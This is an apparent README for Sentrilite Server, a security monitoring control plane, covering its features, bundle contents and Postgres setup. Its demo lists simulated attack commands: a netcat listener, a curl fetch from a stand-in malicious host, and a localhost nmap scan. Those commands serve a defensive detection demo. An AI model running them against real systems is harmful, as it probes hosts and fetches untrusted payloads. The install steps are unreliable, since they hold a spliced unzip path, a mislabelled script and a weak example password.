Sentrilite Server -- Control Plane, API and UI for Sentrilite Agents.
Website: https://sentrilite.com
Contact: info@sentrilite.com
Live Demo - Active Threat Response
What This Demo Shows
- Detection of active threats during execution
- Risk scoring based on syscall + process + network behavior
- Automatic process termination for high-risk activity
This demo shows real-time detection and automatic termination of malicious activity on a live Linux system using Sentrilite.
| Color | Category | Meaning |
|---|---|---|
| Red | Critical Risk | Confirmed malicious behavior with high confidence |
| Orange | Medium Risk | Suspicious activity requiring investigation |
| Purple | Active Response | Enforcement action taken - process terminated |
The following commands were used for simulation:
sudo nc -l 5000
curl http://malicious_payload.com >/dev/null 2>&1
nmap -p 22,80,443 127.0.0.1 >/dev/null 2>&1
Main Dashboard
PDF Report
Sentrilite Workflow Diagram
Sentrilite Server is the main control plane for Sentrilite agents. It ingests real-time telemetry from endpoints, servers and Kubernetes nodes, correlates alerts, and exposes everything through a single web dashboard and API.
Key Features
-
Centralized Control Plane Manage and monitor all Sentrilite agents from a single server across cloud, on-prem, and Kubernetes environments.
-
Manage Alerts All alerts are encrypted using tls/ssl keys and saved to a centralized postgres db.
-
Real-Time Telemetry Ingestion High-throughput ingestion of structured process, file, and network events streamed from agents in real time.
-
Unified Web Dashboard Web UI for live event streaming, alert triage, node health, rule management, and reporting.
-
Detection-as-Code & Response (DACR) Define and manage detection rules centrally using JSON. Rules are applied instantly across all connected agents -- no restarts or redeploys.
-
Risk Scoring & Alerting Events are tagged, scored, and escalated into alerts with clear context for fast triage and response.
-
AI / Heuristic Insights (Optional) Generate per-node security insights using LLMs or built-in heuristics to summarize alerts and highlight suspicious behavior.
-
Audit & Reporting Export audit-ready reports (PDF / JSON / CSV) with timelines, risky activity, and per-node summaries.
-
Kubernetes-Aware Understands nodes, pods, containers, and namespaces when agents run as DaemonSets, presenting normalized data in the UI.
-
Integrations Forward alerts to existing tooling such as Prometheus Alertmanager, PagerDuty, Slack, or external SIEMs.
-
Scalable & Lightweight Designed to handle high event volumes with minimal operational overhead.
Contents of this Bundle
| File | Purpose |
|---|---|
install_db.sh |
Script to load the ebpf kernel module |
sentrilite-serverctl.sh |
Script to start/stop sentrilite-server |
sentrilite-server |
Go control-plane server that accepts alerts from agents and hosts the admin dashboard |
ui/sentrilite.html |
Main frontend UI for viewing node status/alerts/reports etc. |
ss.conf |
Configuration file for Sentrilite Server |
server.cnf |
Configuration file for generating keys. |
license.key |
Sentrilite License key file |
LICENSE.txt |
Sentrilite License Agreement |
gen_keys.txt |
Instructions to create tls/ssl/jwt keys for authentication/authorization |
README.md |
This document |
System Requirements
- Ports: 8080 (dashboard), 9765 (WebSocket for agents)
General Requirements
- postgres db: Saves alerts to postgres db which is created by the installation script.
Licensing
The project is currently using a trial license.key .
Third-Party Integrations
- SIEMS: Can seamlessly integrate with third party SIEM tools.
- Can push alerts to Pagerduty/Prometheus-Alert-Manager.
Installation Steps
- Unzip the bundle:
unzip sentrilite_se/install.shrver_bundle.zip
cd sentrilite-server
- Start Postgres Server and create sentrilite database
sudo -u sentrilite psql -d sentrilite
CREATE USER sentrilite WITH PASSWORD 'prod';
CREATE DATABASE sentrilite OWNER sentrilite;
sudo ./install_db.sh